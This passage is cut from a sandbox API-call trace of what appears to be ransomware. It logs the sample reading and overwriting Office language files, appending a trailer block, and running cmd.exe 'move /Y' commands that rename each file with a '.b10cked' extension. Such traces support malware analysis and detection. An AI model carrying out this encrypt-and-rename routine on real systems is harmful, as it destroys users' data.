lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xea4, dwThreadId=0xd34)) returned 1 [0154.965] CloseHandle (hObject=0x110) returned 1 [0154.965] CloseHandle (hObject=0x114) returned 1 [0154.965] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0154.965] CharUpperBuffW (in: lpsz="C:\\Users\\All 
Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0154.965] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0154.965] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.965] ReleaseMutex (hMutex=0xf8) returned 1 [0154.965] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.965] ReleaseMutex (hMutex=0xf8) returned 1 [0154.965] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.965] ReleaseMutex (hMutex=0xf8) returned 1 [0154.965] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0154.965] ReleaseMutex (hMutex=0xf8) returned 1 [0154.965] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0154.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3fb60 [0154.966] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.966] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21175780583) returned 1 [0154.969] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3fb60 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3fb60 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3fb60 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3fb60 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3fb60 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3fb60 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.969] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3fb60 [0154.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3fb60 [0154.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3fb60 [0154.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0154.970] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3f678 [0154.970] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0155.097] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0155.097] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0155.097] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3fb60 [0155.097] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0155.097] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0155.097] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0155.097] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3fb60 [0155.097] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0155.097] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0155.097] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0155.755] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0155.789] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x1daf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x1daf, lpOverlapped=0x0) returned 1 [0156.034] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0156.034] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.042] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.042] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x1daf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, 
lpNumberOfBytesWritten=0x12ec1c*=0x1daf, lpOverlapped=0x0) returned 1 [0156.042] SetFilePointer (in: hFile=0x114, lDistanceToMove=-130479, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1fdb1 [0156.042] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.043] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0156.054] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x1daf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x1daf, lpOverlapped=0x0) returned 1 [0156.089] SetFilePointer (in: hFile=0x114, lDistanceToMove=-130479, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1fdb1 [0156.089] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.089] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0156.090] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x1daf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x1daf, lpOverlapped=0x0) returned 1 [0156.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, 
lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0156.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONINTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0156.095] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3fb60 [0156.095] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0156.096] CloseHandle (hObject=0x114) returned 1 [0156.102] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX") returned 0x3c [0156.103] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0156.104] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, 
lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\ONINTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xd60, dwThreadId=0x694)) returned 1 [0156.106] CloseHandle (hObject=0x110) returned 1 [0156.106] CloseHandle (hObject=0x114) returned 1 [0156.106] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0156.106] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0156.106] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0156.106] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.106] ReleaseMutex (hMutex=0xf8) returned 1 [0156.106] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.106] ReleaseMutex (hMutex=0xf8) returned 1 [0156.106] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.106] ReleaseMutex (hMutex=0xf8) returned 1 [0156.106] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0156.106] ReleaseMutex (hMutex=0xf8) returned 1 [0156.106] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\outllibr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0156.181] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.181] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x37560 [0156.181] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.181] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21297051072) returned 1 [0156.181] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.181] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x37560 [0156.181] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x37560 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x37560 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x37560 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x37560 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x37560 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.182] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x37560 [0156.183] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.183] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.183] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x37560 [0156.183] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.183] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.183] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x37560 [0156.183] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0156.183] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x37078 [0156.183] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0156.207] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0156.207] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0156.207] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x37560 [0156.207] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0156.207] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0156.207] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0156.208] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x37560 [0156.208] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 